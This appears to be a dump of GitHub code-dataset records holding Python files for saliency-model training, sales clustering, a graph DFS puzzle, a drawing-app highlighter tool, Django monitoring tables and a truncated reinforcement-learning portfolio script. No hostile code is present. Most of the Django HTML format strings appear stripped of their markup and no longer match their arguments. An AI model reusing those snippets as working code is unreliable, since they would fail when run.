version\n def eval_pr(self, y_pred, y, num):\n prec, recall = torch.zeros(num), torch.zeros(num)\n thlist = torch.linspace(0, 1 - 1e-10, num)\n for i in range(num):\n y_temp = (y_pred >= thlist[i]).float()\n tp = (y_temp * y).sum()\n prec[i], recall[i] = tp / (y_temp.sum() + 1e-20), tp / y.sum()\n return prec, recall\n\n def validation(self):\n avg_mae = 0.0\n self.net.eval()\n for i, data_batch in enumerate(self.val_loader):\n with torch.no_grad():\n images, labels = data_batch\n images, labels = images.to(self.device), labels.to(self.device)\n prob_pred = self.net(images)\n avg_mae += self.eval_mae(prob_pred, labels).cpu().item()\n self.net.train()\n return avg_mae / len(self.val_loader)\n\n def test(self, num):\n avg_mae, img_num = 0.0, len(self.test_loader)\n avg_prec, avg_recall = torch.zeros(num), torch.zeros(num)\n for i, data_batch in enumerate(self.test_loader):\n with torch.no_grad():\n images, labels = data_batch\n shape = labels.size()[2:]\n images = images.to(self.device)\n prob_pred = F.interpolate(self.net(images), size=shape, mode='bilinear', align_corners=True).cpu()\n mae = self.eval_mae(prob_pred, labels)\n prec, recall = self.eval_pr(prob_pred, labels, num)\n print(\"[%d] mae: %.4f\" % (i, mae))\n print(\"[%d] mae: %.4f\" % (i, mae), file=self.test_output)\n avg_mae += mae\n avg_prec, avg_recall = avg_prec + prec, avg_recall + recall\n avg_mae, avg_prec, avg_recall = avg_mae / img_num, avg_prec / img_num, avg_recall / img_num\n score = (1 + self.beta ** 2) * avg_prec * avg_recall / (self.beta ** 2 * avg_prec + avg_recall)\n score[score != score] = 0 # delete the nan\n print('average mae: %.4f, max fmeasure: %.4f' % (avg_mae, score.max()))\n print('average mae: %.4f, max fmeasure: %.4f' % (avg_mae, score.max()), file=self.test_output)\n\n def train(self):\n iter_num = len(self.train_loader.dataset) // self.config.batch_size\n best_mae = 1.0 if self.config.val else None\n for epoch in range(self.config.epoch):\n loss_epoch = 0\n for i, data_batch in enumerate(self.train_loader):\n if (i + 1) > iter_num: break\n self.net.zero_grad()\n x, y = data_batch\n x, y = x.to(self.device), y.to(self.device)\n y_pred = self.net(x)\n loss = self.loss(y_pred, y)\n loss.backward()\n utils.clip_grad_norm_(self.net.parameters(), self.config.clip_gradient)\n self.optimizer.step()\n loss_epoch += loss.cpu().item()\n print('epoch: [%d/%d], iter: [%d/%d], loss: [%.4f]' % (\n epoch, self.config.epoch, i, iter_num, loss.cpu().item()))\n if self.config.visdom:\n error = OrderedDict([('loss:', loss.cpu().item())])\n self.visual.plot_current_errors(epoch, i / iter_num, error)\n if (epoch + 1) % self.config.epoch_show == 0:\n print('epoch: [%d/%d], epoch_loss: [%.4f]' % (epoch, self.config.epoch, loss_epoch / iter_num),\n file=self.log_output)\n if self.config.visdom:\n avg_err = OrderedDict([('avg_loss', loss_epoch / iter_num)])\n self.visual.plot_current_errors(epoch, i / iter_num, avg_err, 1)\n img = OrderedDict([('origin', self.mean + x.cpu()[0]), ('label', y.cpu()[0][0]),\n ('pred_label', y_pred.cpu()[0][0])])\n self.visual.plot_current_img(img)\n if self.config.val and (epoch + 1) % self.config.epoch_val == 0:\n mae = self.validation()\n print('--- Best MAE: %.4f, Curr MAE: %.4f ---' % (best_mae, mae))\n print('--- Best MAE: %.4f, Curr MAE: %.4f ---' % (best_mae, mae), file=self.log_output)\n if best_mae > mae:\n best_mae = mae\n torch.save(self.net.state_dict(), '%s/models/best.pth' % self.config.save_fold)\n if (epoch + 1) % self.config.epoch_save == 0:\n torch.save(self.net.state_dict(), '%s/models/epoch_%d.pth' % (self.config.save_fold, epoch + 1))\n torch.save(self.net.state_dict(), '%s/models/final.pth' % self.config.save_fold)\n","repo_name":"AceCoooool/NLDF-pytorch","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":7030,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"70"}
+{"seq_id":"25231499704","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Roll Number: 22CD91F01\n# Name of the student: Nazeer Haider\n# Project Code: SRHC-AS\n# Project Title: Sales Grouping by Representatives using Single Linkage Agglomerative (Bottom-Up) Clustering Technique\n\n# Import the libraries\nimport numpy as np\nimport pandas as pd\n\n\n# In[2]:\n\n\n# Load the sales data from CSV file\nsales_data = pd.read_csv(\"sales.csv\")\nsales_data = sales_data.sample(1000) # Run on full dataset it takes long time, so I have used just 1000 samples, you can run with full dataset by comment this line\nsales_data.head()\n\n\n# In[3]:\n\n\n# Drop the unnecessary columns from the data\nsales_data = sales_data.drop(\"Record\", axis=1)\n\n\n# In[4]:\n\n\n# In dataset \"Deat ID\" have a mixture of \"Category-Year-ID\". So I have split this column on the basis of \"-\".\n# And you have taken Category and ID, date is already in dataset.\n# new data frame with split value columns\nnew = sales_data[\"Deal ID\"].str.split(\"-\", n = 2, expand = True)\n \n# making separate first name column from new data frame\nsales_data[\"Category\"]= new[0]\n \n# making separate last name column from new data frame\nsales_data[\"ID\"]= new[2]\nsales_data['ID'] = sales_data['ID'].astype(str).astype(int)\n \n# Dropping old Name columns\nsales_data.drop(columns =[\"Deal ID\"], inplace = True)\n \n# df display\nsales_data\n\n\n# In[5]:\n\n\n# Encoding the categorical parameters\nencoded_sales_data = pd.get_dummies(sales_data, columns = ['Country', 'Category', 'Sales Rep'])\nencoded_sales_data\n\n\n# In[6]:\n\n\n# Convert the dataset into numpy array for ease of use\nencoded_sales_data = encoded_sales_data.to_numpy()\n\n\n# In[7]:\n\n\n# Define a function to compute the cosine similarity between two vectors\ndef cosine_similarity(x, y):\n return np.dot(x, y) / (np.linalg.norm(x) * np.linalg.norm(y))\n\n\n# In[8]:\n\n\n# Define a function to compute the mean distance between a sample and all other points in the same cluster\ndef intra_cluster_distance(sample, cluster):\n distances = [cosine_similarity(sample, other) for other in cluster]\n return sum(distances) / len(distances)\n\n\n# In[9]:\n\n\n# Define a function to compute the mean distance between a sample and all other points in the next nearest cluster\ndef nearest_cluster_distance(sample, clusters):\n distances = []\n for other_cluster in clusters:\n if other_cluster == []:\n continue\n intra_distance = intra_cluster_distance(sample, other_cluster)\n distances.append(intra_distance)\n return sum(distances) / len(distances)\n\n\n# In[10]:\n\n\n# Define the K-means clustering algorithm\ndef kmeans_clustering(data, k=3, num_iterations=20):\n # Initialize the cluster means as k distinct data points\n cluster_means = data[np.random.choice(len(data), size=k, replace=False)]\n \n # Perform the iterations\n for i in range(num_iterations):\n # Assign each data point to the nearest cluster\n clusters = [[] for j in range(k)]\n for point in data:\n distances = [cosine_similarity(point, mean) for mean in cluster_means]\n nearest_mean = np.argmax(distances)\n clusters[nearest_mean].append(point)\n # Update the cluster means\n for j in range(k):\n if clusters[j] == []:\n continue\n cluster_means[j] = np.mean(clusters[j], axis=0)\n\n # Assign cluster labels to data points\n kmeans_labels = np.zeros(len(data), dtype=int) # initialize labels as zeros\n for i in range(k):\n cluster_points = clusters[i] # points in the i-th cluster\n for point in cluster_points:\n # Find the indices of the points that match the current point in the cluster\n match_indices = np.where(np.all(data == point, axis=1))[0]\n # Assign the current cluster label to the matching points\n kmeans_labels[match_indices] = i\n \n # Compute the Silhouette coefficient\n s_values = []\n for i in range(len(data)):\n a = intra_cluster_distance(data[i], clusters[np.argmax([cosine_similarity(data[i], mean) for mean in cluster_means])])\n b = nearest_cluster_distance(data[i], clusters)\n s = (b - a) / max(a, b)\n s_values.append(s)\n silhouette_coefficient = np.mean(s_values)\n \n return clusters, silhouette_coefficient, kmeans_labels\n\n\n# In[11]:\n\n\n# Save the clustering information to a file\ndef save_cluster(clusters, filename):\n with open(filename, \"w\") as f:\n f.write(f\"{k} Clusters for best k value :\\n\")\n for j, cluster in enumerate(clusters):\n f.write(f\"Cluster {j+1} have {len(cluster)} data points:\\n\")\n f.write(str(sorted(sales_data.index[sales_data[sales_data.columns[-1]] == j].tolist())))\n f.write(\"\\n\\n\")\n\n\n# In[12]:\n\n\n# Find optimal value of k\ns_best = -1\nk_best = -1\nfor k in range(3, 7):\n # K-means clustering\n kmeans_clusters, s, kmeans_labels = kmeans_clustering(encoded_sales_data, k, num_iterations=20)\n\n if s > s_best:\n s_best = s\n k_best = k\n \n sales_data[\"KmeansCluster\"] = kmeans_labels # Add the KmeansCluster column\n save_cluster(kmeans_clusters, \"kmeans.txt\") # Save the kmeans clustering information to a file for best k value\n \n # Print Clusters Info\n print(f\"Clusters for k = {k}:\")\n for j, cluster in enumerate(kmeans_clusters):\n print(f\"Cluster {j+1} have {len(cluster)} data points\")\n print(f\"Silhouette coefficient for k = {k}: {s}\\n\")\n \nprint('Optimal value of k:', k_best)\nsales_data.head(10)\n\n\n# In[13]:\n\n\ndef single_linkage_clustering(X, k):\n \"\"\"Perform single linkage agglomerative clustering using cosine similarity as the distance measure\"\"\"\n n_samples = X.shape[0]\n distances = np.zeros((n_samples, n_samples))\n for i in range(n_samples):\n for j in range(n_samples):\n if i == j:\n continue\n distances[i, j] = 1 - cosine_similarity(X[i], X[j])\n \n # Initialize clusters with each sample as its own cluster\n clusters = [[i] for i in range(n_samples)]\n \n # Merge clusters until the desired number of clusters is reached\n while len(clusters) > k:\n min_distance = np.inf\n merge_indices = (0, 0)\n # Find the two clusters with the smallest distance between them\n for i in range(len(clusters)):\n for j in range(i+1, len(clusters)):\n for c1 in clusters[i]:\n for c2 in clusters[j]:\n distance = distances[c1, c2]\n if distance < min_distance:\n min_distance = distance\n merge_indices = (i, j)\n \n # Merge the two clusters with the smallest distance\n i, j = merge_indices\n clusters[i] += clusters[j]\n del clusters[j]\n \n labels = {}\n for i, cluster in enumerate(clusters):\n for point in cluster:\n labels[point] = i\n agg_labels = [labels[i] for i in range(len(labels))]\n \n return clusters, agg_labels\n\n\n# In[17]:\n\n\n# run agglomerative clustering algorithm\nagg_clusters, agg_labels = single_linkage_clustering(encoded_sales_data, k_best)\n\nsales_data[\"AggCluster\"] = agg_labels # Add the AggCluster column \nsave_cluster(agg_clusters, \"agglomerative.txt\") # Save the agglomerative clustering information to a file for best k value\n\nsales_data.head(10)\n\n\n# In[18]:\n\n\nk = k_best\nkmeans_labels = sales_data['KmeansCluster'].tolist()\nkmeans_labels = np.asarray(kmeans_labels, dtype=int)\nagg_labels = np.asarray(agg_labels, dtype=int)\n\n# compute Jaccard similarity\njaccard_similarities = np.zeros((k, k))\nfor i in range(k):\n for j in range(k):\n intersection = len(kmeans_labels[(agg_labels == j) & (kmeans_labels == i)])\n union = len(kmeans_labels[(agg_labels == j) | (kmeans_labels == i)])\n jaccard_similarities[i, j] = intersection / union\nprint(jaccard_similarities)\n\n","repo_name":"N786h/MachineLearning","sub_path":"22CD91F01_SRHC-AS/22CD91F01_SRHC-AS.py","file_name":"22CD91F01_SRHC-AS.py","file_ext":"py","file_size_in_byte":7919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"3551232354","text":"# https://www.acmicpc.net/problem/11724\n\nimport sys\n\nsys.setrecursionlimit(10000)\ninput = sys.stdin.readline\n\n\ndef dfs(node):\n visited[node] = 1\n for new_node in graph[node]:\n if visited[new_node]:\n continue\n dfs(new_node)\n\n\nn, m = map(int, input().strip().split(' '))\ngraph = [list() for _ in range(n + 1)]\nfor _ in range(m):\n x, y = map(int, input().strip().split(' '))\n graph[x].append(y)\n graph[y].append(x)\n\nvisited = [0 for _ in range(n + 1)]\nans = 0\nfor node in range(1, n + 1):\n if not visited[node]:\n dfs(node)\n ans += 1\n\nprint(ans)\n","repo_name":"yonghee12/algorithm_study","sub_path":"02_baekjoon/s2_11724_연결 요소의 개수_linked_list.py","file_name":"s2_11724_연결 요소의 개수_linked_list.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9540743158","text":"import cairo\nfrom .tool_pencil import ToolPencil\nfrom .abstract_classic_tool import AbstractClassicTool\n\nclass ToolHighlighter(ToolPencil):\n\t__gtype_name__ = 'ToolHighlighter'\n\n\tdef __init__(self, window, **kwargs):\n\t\t# Context: this is the name of a tool, a thick pencil dedicated to\n\t\t# highlight text, for example in screenshots\n\t\tAbstractClassicTool.__init__(self, 'highlight', _(\"Highlighter\"), \\\n\t\t 'tool-highlight-symbolic', window)\n\t\tself.use_operator = False\n\t\tself._path = None\n\t\tself.add_tool_action_boolean('highlight-alpha', True)\n\t\tself.add_tool_action_boolean('highlight-rigid', True)\n\t\tself.add_tool_action_enum('highlight-bg', 'light')\n\n\tdef get_editing_tips(self):\n\t\tlabel_options = self.label + \" - \"\n\t\tif self._bg_type == 'light':\n\t\t\tlabel_options += _(\"Dark text on light background\")\n\t\t\tlabel_modifier_shift = _(\"Press to temporarily highlight\" + \\\n\t\t\t \" on dark background instead\")\n\t\telse:\n\t\t\tlabel_options += _(\"Light text on dark background\")\n\t\t\tlabel_modifier_shift = _(\"Press to temporarily highlight\" + \\\n\t\t\t \" on light background instead\")\n\t\tif self.get_image().get_mouse_is_pressed():\n\t\t\tlabel_modifier_shift = None\n\n\t\tfull_list = [label_options, label_modifier_shift]\n\t\treturn list(filter(None, full_list))\n\n\tdef on_options_changed(self):\n\t\tsuper().on_options_changed()\n\t\tself._bg_type = self.get_option_value('highlight-bg')\n\t\tself._force_alpha = self.get_option_value('highlight-alpha')\n\t\tself._is_rigid = self.get_option_value('highlight-rigid')\n\t\t# refreshing the rendered operation isn't pertinent\n\n\tdef get_options_label(self):\n\t\treturn _(\"Highlighter options\")\n\n\t############################################################################\n\n\tdef on_press_on_area(self, event, surface, event_x, event_y):\n\t\tself.set_common_values(event.button, event_x, event_y)\n\t\tself._path = None\n\n\t\tself.update_modifier_state(event.state)\n\t\tif 'SHIFT' in self._modifier_keys:\n\t\t\tif self._bg_type == 'light':\n\t\t\t\tself._bg_type = 'dark'\n\t\t\telse:\n\t\t\t\tself._bg_type = 'light'\n\n\tdef _add_point(self, event_x, event_y):\n\t\tcairo_context = self.get_context()\n\t\tif self._path is None:\n\t\t\tcairo_context.move_to(self.x_press, self.y_press)\n\t\telif self._didnt_really_move(cairo_context, event_x, event_y):\n\t\t\tlength = -1\n\t\t\tfor pts in self._path:\n\t\t\t\tif pts[1] == ():\n\t\t\t\t\tcontinue\n\t\t\t\tlength += 1\n\t\t\t\t# a better technique to find the length probably exists\n\t\t\tfor index, pts in enumerate(self._path):\n\t\t\t\tif pts[1] == ():\n\t\t\t\t\tcontinue\n\t\t\t\tif pts[0] == cairo.PathDataType.MOVE_TO:\n\t\t\t\t\tcairo_context.move_to(pts[1][0], pts[1][1])\n\t\t\t\telif index == length:\n\t\t\t\t\tevent_x = (pts[1][0] + event_x) / 2\n\t\t\t\t\tevent_y = (pts[1][1] + event_y) / 2\n\t\t\t\t\tbreak\n\t\t\t\telse: # if pts[0] == cairo.PathDataType.LINE_TO:\n\t\t\t\t\tcairo_context.line_to(pts[1][0], pts[1][1])\n\t\tcairo_context.line_to(event_x, event_y)\n\t\tself._path = cairo_context.copy_path()\n\n\tdef _didnt_really_move(self, cairo_context, event_x, event_y):\n\t\t\"\"\"Tells if the pointer has moved enough to add a new point, otherwise\n\t\tthe last point will be changed.\n\t\tIt's an option that can be disabled.\n\t\tThe context of an highlighter tool means the direction is biased: i will\n\t\tassume the underlying text is written horizontally, and in straight\n\t\tlines; so the highlighting will also be straight, but the chosen line\n\t\tmay change during the stroke.\"\"\"\n\t\tcairo_context.append_path(self._path)\n\t\tif not self._is_rigid:\n\t\t\treturn False\n\n\t\trigidity = min(self.tool_width, 10.0)\n\t\tif abs(cairo_context.get_current_point()[0] - event_x) > rigidity:\n\t\t\treturn False\n\t\tif abs(cairo_context.get_current_point()[1] - event_y) > rigidity / 5:\n\t\t\treturn False\n\n\t\tcairo_context.new_path()\n\t\treturn True\n\n\tdef on_motion_on_area(self, event, surface, event_x, event_y, render=True):\n\t\tself._add_point(event_x, event_y)\n\t\tif not render:\n\t\t\treturn\n\t\toperation = self.build_operation()\n\t\tself.do_tool_operation(operation)\n\n\tdef on_release_on_area(self, event, surface, event_x, event_y):\n\t\tself._add_point(event_x, event_y)\n\t\toperation = self.build_operation()\n\t\tself.apply_operation(operation)\n\n\t############################################################################\n\n\tdef build_operation(self):\n\t\toperation = {\n\t\t\t'tool_id': self.id,\n\t\t\t'rgba': self.main_color,\n\t\t\t'width': self.tool_width,\n\t\t\t'path': self._path,\n\t\t\t'bg-type': self._bg_type,\n\t\t\t'halpha': self._force_alpha\n\t\t}\n\t\treturn operation\n\n\tdef do_tool_operation(self, operation):\n\t\tself.start_tool_operation(operation)\n\t\tif operation['path'] is None:\n\t\t\treturn\n\t\tccontext = self.get_context()\n\t\tccontext.set_line_cap(cairo.LineCap.SQUARE)\n\t\tccontext.set_line_join(cairo.LineJoin.ROUND)\n\t\tccontext.set_line_width(operation['width'])\n\n\t\tif operation['bg-type'] == 'light':\n\t\t\toperator = cairo.Operator.MULTIPLY\n\t\telse:\n\t\t\toperator = cairo.Operator.SCREEN\n\t\tccontext.set_operator(operator)\n\n\t\tmain_color = operation['rgba']\n\t\tif operation['halpha']:\n\t\t\tmain_color[3] = 0.5\n\t\tccontext.set_source_rgba(*main_color)\n\n\t\tccontext.append_path(operation['path'])\n\t\tccontext.stroke()\n\n\t############################################################################\n################################################################################\n\n","repo_name":"maoschanz/drawing","sub_path":"src/tools/classic_tools/tool_highlight.py","file_name":"tool_highlight.py","file_ext":"py","file_size_in_byte":5267,"program_lang":"python","lang":"en","doc_type":"code","stars":716,"dataset":"github-code","pt":"70"}
+{"seq_id":"22368349872","text":"import json\nfrom collections\t\t\timport OrderedDict\n\nfrom django.shortcuts\t\t\timport render\nfrom django.utils.safestring\t\timport mark_safe\nfrom django.utils\t\t\timport timezone\nfrom django.utils.timezone\t\timport utc\nfrom django.conf\t\t\timport settings\n\nfrom django.db.models import F\n\nimport\tdjango_tables2 as tables\nfrom django.utils.html import format_html\n\n\nfrom purity.models\t\t\timport pur\nfrom evdisp.models\t\t\timport evdisp\nfrom .models\t\t\t\timport monrun\n\nfrom utils.tpcMap\t\t\timport *\n\n#########################################################\nPlanes = ('U','V','Z')\n\n# ---\nmonchartHitsHeaderURL\t= '%s Hits/RMS '\nmonchartChargeHeaderURL\t= '%s Charge/RMS '\nmonchartRawRmsURL\t= '%s Mean of Raw RMS '\n\n# ---\nmonPatterns = {\n \"hits1\":\t\"Plane %s Mean NHits\",\n \"hits2\":\t\"Plane %s Mean of Hit RMS\",\n \"charge1\":\t\"Plane %s Mean of Charge\",\n \"charge2\":\t\"Plane %s RMS of Charge\",\n \"dead\":\t\"NDead Channels\",\n \"noise1\":\t\"NNoisy Channels 6Sigma away from mean value of the ADC RMS\",\n \"noise2\":\t\"NNoisy Channels Above ADC RMS Threshold\",\n \"meanrawrms\":\t\"Plane %s Mean of Raw RMS\",\n}\n\n\nmonTags = {\n 'apa3':\t'EVENT DISPLAY FOR APA3 ',\n 'evdisp':\t'EVENT DISPLAY ',\n 'femb':\t'FEMB monitor ',\n 'crt':\t'CRT ',\n 'purity':\t'PURITY ',\n}\n\n#########################################################\n# We need this to make links to this service itself.\ntry:\n from django.urls import reverse\nexcept ImportError:\n print(\"FATAL IMPORT ERROR\")\n exit(-3)\n\n\n#########################################################\n#########################################################\n#########################################################\ndef pad0four(input):\n mylist = input.split(',')\n newList = []\n for item in mylist: newList.append('{0:0>4}'.format(item))\n return \",\".join(newList)\n\n######################################################### \n################## LINK UTILS ########################### \n#########################################################\n\ndef makeImageLink(site, evdispURL, j_uuid, run, evnum, datatype, group):\n filename = evdisp.makename(evnum, datatype, group)\n # debug only: print(evnum, datatype, group)\n # debug only: print(\"filename\", filename)\n return \"http://\"+site+\"/\"+evdispURL+\"/\"+j_uuid+\"/\"+filename\n\n\ndef makeEvLink(site, run, evnum):\n return mark_safe('%s ' % (site, run, evnum, evnum))\n\n\n######################################################### \n################### TABLES ############################# \n#########################################################\n\nclass RunTable(tables.Table):\n Run\t= tables.Column()\n ts\t= tables.Column(verbose_name='Time Added to DB')\n evs\t= tables.Column(verbose_name='Event Numbers')\n \n def set_site(self, site=''):\n self.site=site\n class Meta:\n attrs\t= {'class': 'paleblue'}\n\n#---\nclass MonitorTable(tables.Table):\n def set_site(self, site=''):\n self.site=site\n\n def makelink(self, what, key, value):\n return mark_safe('%s '\n % (self.site, reverse(what), key, value, value))\n\n def renderDateTime(self, dt): # common format defined here.\n return timezone.localtime(dt).strftime(settings.TIMEFORMAT)\n\n def modifyName(self, oldName, newName):\n self.base_columns[oldName].verbose_name = newName\n\n#---\nclass PurityTable(MonitorTable):\n def render_tpc(self, value):\n return str(value)+': '+tpcMap[value]\n class Meta:\n model = pur\n attrs = {'class': 'paleblue'}\n#---\nclass ShowMonTable(MonitorTable):\n \n# def __init__(self, *args, **kwargs):\n# self.hdr = kwargs.pop('hdr')\n# super(ShowMonTable, self).__init__(*args, **kwargs)\n\n def changeName(self, newName):\n self.base_columns['items'].verbose_name = newName\n\n items = tables.Column()\n\n \n class Meta:\n attrs = {'class': 'paleblue'}\n#---\n#############################################################\n#############################################################\n#############################################################\nclass MonRunTable(MonitorTable):\n def render_run(self, value, record):\n subrun_url = '%s::%s::%s::%s ' % (\n self.site, value, str(record.subrun), str(record.dl), record.jobtype, value, str(record.subrun), str(record.dl), record.jobtype\n )\n output=mark_safe(subrun_url)+' '+record.j_uuid # +' '+str(record.ts.strftime(settings.TIMEFORMAT))\n\n return format_html(output)\n \n # ---\n # we now have the processing type in the metadata (e.g. \"monitor\")\n # which should allow us to simplify the code\n #\n #\n # this is the most important (and crafty) method of all, we parse json\n # and populate tables within the monrun table dynamically\n \n def render_summary(self, value, record):\n # this better be moved to the template...\n output = ''\n \n data = json.loads(value, object_pairs_hook=OrderedDict)\n d = data[0]\n\n monType = None\n try:\n monType = d['Type']\n except:\n pass\n\n # ---\n if monType is None:\n output+='ERROR PARSING JSON
'\n return format_html(output)\n \n # ---\n if monType=='monitor':\n try:\n # column headers for hits and charge\n try:\n for plane in Planes: output+= (monchartHitsHeaderURL)\t% (self.site, plane, plane)\n except:\n pass\n\n try:\n for plane in Planes: output+= (monchartChargeHeaderURL)\t% (self.site, plane, plane)\n except:\n pass\n\n try:\n for plane in Planes:\n testing = d[monPatterns['meanrawrms'] % plane]\n output+= (monchartRawRmsURL) % (self.site, plane, plane)\n except:\n pass\n\n # column headers for dead and noisy channels\n output+=('Dead Channels ') % (self.site)\n output+=('Noisy over 6σ vs over the threshold') % (self.site)\n\n output+='' # ready to add the data to columns\n \n # columns for hits and charge\n try:\n for plane in Planes: output+= ('%s %s ')\t% (d[monPatterns['hits1']\t% plane], d[monPatterns['hits2'] % plane])\n except:\n pass\n \n try:\n for plane in Planes: output+= ('%s %s ')\t% (d[monPatterns['charge1']\t% plane], d[monPatterns['charge2']% plane])\n except:\n pass\n \n try:\n for plane in Planes: output+= ('%s ')\t\t% (d[monPatterns['meanrawrms']\t% plane])\n except:\n pass\n \n # columns for dead and noisy channels\n output+='%s ' % (pad0four(d[\"NDead Channels\"]))\n output+=('%s %s ') % (pad0four(d[\"NNoisy Channels 6Sigma away from mean value of the ADC RMS\"]),pad0four(d[\"NNoisy Channels Above ADC RMS Threshold\"]))\n \n output+=' '\n except:\n output+=' ERROR PARSING JSON '\n\n return format_html(output)\n \n # ---\n if monType=='reco':\n try:\n output+='Number of reconstructed tracks: %s Number of long reconstructed tracks: %s ' % (d['Number of reconstructed tracks'], d['Number of long reconstructed tracks'])\n output+=''\n except:\n output+='ERROR PARSING JSON '\n return format_html(output)\n\n # ---\n try:\n output+=monTags[monType]\n except: \n output+='ERROR LOOKING UP PROCESSING TYPE '\n \n return format_html(output)\n\n\n# Sample summary for the \"reco\" product:\n# [\n# {\n# \"Number of reconstructed tracks\": \"52.80\",\n# \"Number of long reconstructed tracks\": \"19.80\",\n# \"run\": \"run005077_0045_dl08\",\n# \"TimeStamp\": \"Tue Oct 9 05:10:28 2018\",\n# \"Type\": \"reco\"\n# }\n# ]\n\n# Sample summary for the \"monitor\" product:\n# [\n# {\n# \"Plane U Mean NHits\": \"14.00,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane V Mean NHits\": \"0.00,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane Z Mean NHits\": \"0.00,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane U Mean of Charge\": \"139.53,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane V Mean of Charge\": \"0.00,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane Z Mean of Charge\": \"653.67,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane U RMS of Charge\": \"77.52,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane V RMS of Charge\": \"0.00,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane Z RMS of Charge\": \"383.14,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane U Mean of Hit RMS\": \"5.02,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane V Mean of Hit RMS\": \"0.00,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane Z Mean of Hit RMS\": \"4.04,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane U RMS of Hit RMS\": \"1.14,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane V RMS of Hit RMS\": \"0.00,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane Z RMS of Hit RMS\": \"1.85,0.00,0.00,0.00,0.00,0.00\",\n# \"NDead Channels\": \"2432,2560,2560,2560,2560, 0\",\n# \"NNoisy Channels 6Sigma away from mean value of the ADC RMS\": \" 128, 0, 0, 0, 0, 0\",\n# \"NNoisy Channels Above ADC RMS Threshold\": \" 71, 0, 0, 0, 0, 0\",\n# \"run\": \"run003611_0001\",\n# \"TimeStamp\": \"Thu Aug 23 21:03:34 2018\",\n# \"Type\": \"monitor\",\n# \"APA\": \"1, 2, 3, 4, 5, 6\"\n# }\n# ]\n\n\n \n class Meta:\n model = monrun\n attrs = {'class': 'paleblue'}\n exclude = ('description','j_uuid','subrun','jobtype','dl',)\n#############################################################\n#############################################################\n#############################################################\n#---\nclass EvdispTable(MonitorTable):\n changroup = tables.Column(verbose_name='Grp')\n# ts = tables.Column(attrs={'td': {'bgcolor': 'red'}})\n\n def render_changroup(self, value, record):\n\n u = makeImageLink(self.site,\n settings.SITE['dqm_evdisp_url'],\n record.j_uuid, record.run, record.evnum, record.datatype, record.changroup)\n \n image_url = ('%s '\n % (self.site,\n u,\n record.run,\n record.evnum,\n record.changroup,\n record.datatype,\n value\n ))\n\n return mark_safe(image_url)\n\n def render_evnum(self, value, record):\n event_url = ('%s '\n % (self.site,\n record.run,\n record.evnum,\n str(value)\n ))\n# event_url=''+str(record.evnum)+' '\n return mark_safe(event_url)\n \n class Meta:\n model = evdisp\n attrs = {'class': 'paleblue'}\n exclude = ('path',)\n template_name = 'django_tables2/bootstrap4.html'\n######################################################### \n\n\n# Keep for later if you want to display the subrun column in the monrun table\n# Right now it's just unused anyway\n # def render_subrun(self, value, record):\n\n # subrun_url = '%s (old) %s (new) ' % (\n # self.site, str(record.run), str(record.subrun), value,\n # self.site, str(record.run), str(record.subrun), value\n # )\n\n # return mark_safe(subrun_url)\n\n","repo_name":"DUNE/p3s","sub_path":"display/monitor/monitorTables.py","file_name":"monitorTables.py","file_ext":"py","file_size_in_byte":12826,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"26593791182","text":"\n\nfrom Agents import ACAgent\nfrom Envs import PortfolioEnv\nimport tensorflow as tf\nimport keras.backend as K\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef main():\n sess = tf.Session()\n K.set_session(sess)\n sand = pd.read_csv(\"C:/Users/Phili/Desktop/fond/data/SAND.csv\", sep=\";\", header = 0, index_col = 0, parse_dates = True).iloc[::-1]\n eric = pd.read_csv(\"C:/Users/Phili/Desktop/fond/data/ERIC.csv\", sep=\";\", header = 0, index_col = 0, parse_dates = True).iloc[::-1]\n sand = sand[\"Closing price\"]#.loc[\"2016-01-01\":\"2018-09-01\"]\n eric = eric[\"Closing price\"]#[\"2016-01-01\":\"2018-09-01\"]\n volv = pd.read_csv(\"C:/Users/Phili/Desktop/fond/data/VOLV.csv\", sep=\";\", header = 0, index_col = 0, parse_dates = True).iloc[::-1]\n volv = volv[\"Closing price\"]#[\"2016-01-01\":\"2018-09-01\"]\n\n\n data = pd.DataFrame({\"sand\":sand, \"eric\":eric, \"volv\":volv}, index=sand.index)\n\n env = PortfolioEnv(data, steps=20, trading_cost=0.025, time_cost = 0.0, augment=0.1)\n state_size = env.observation_space.spaces[\"history\"].shape\n action_size = env.action_space.shape\n action_size = (action_size[0],1,1)\n agent = ACAgent(state_size, action_size,env, sess)\n\n episode = 200\n for e in range(episode):\n weights = {s: [] for s in range(action_size[0])}\n \n cur_state = env.reset()\n action = env.action_space.sample()\n while True:\n cur_state = cur_state.reshape(1,3,50,1)\n action = agent.act(cur_state)\n action = action.reshape(1,3,1,1)\n new_state, reward, info, done = env.step(action)\n new_state = new_state.reshape(1,3,50,1)\n agent.remember(cur_state, action, reward, new_state, done)\n agent.train()\n agent.update_target()\n for s in range(action_size[0]):\n weights[s].append(action.reshape(3,)[s])\n\n cur_state = new_state\n if done:\n print(\"Episode: {}/{}, episode end value: {}, weights: {}\".format(e+1, episode, info[\"portfolio_value\"], action.reshape(3,)))\n break\n if e % 5 == 0:\n plt.subplot(1, episode/5, e/5+1)\n for s in range(action_size[0]):\n plt.plot(weights[s], label=str(s))\n plt.legend()\n\n\n \n 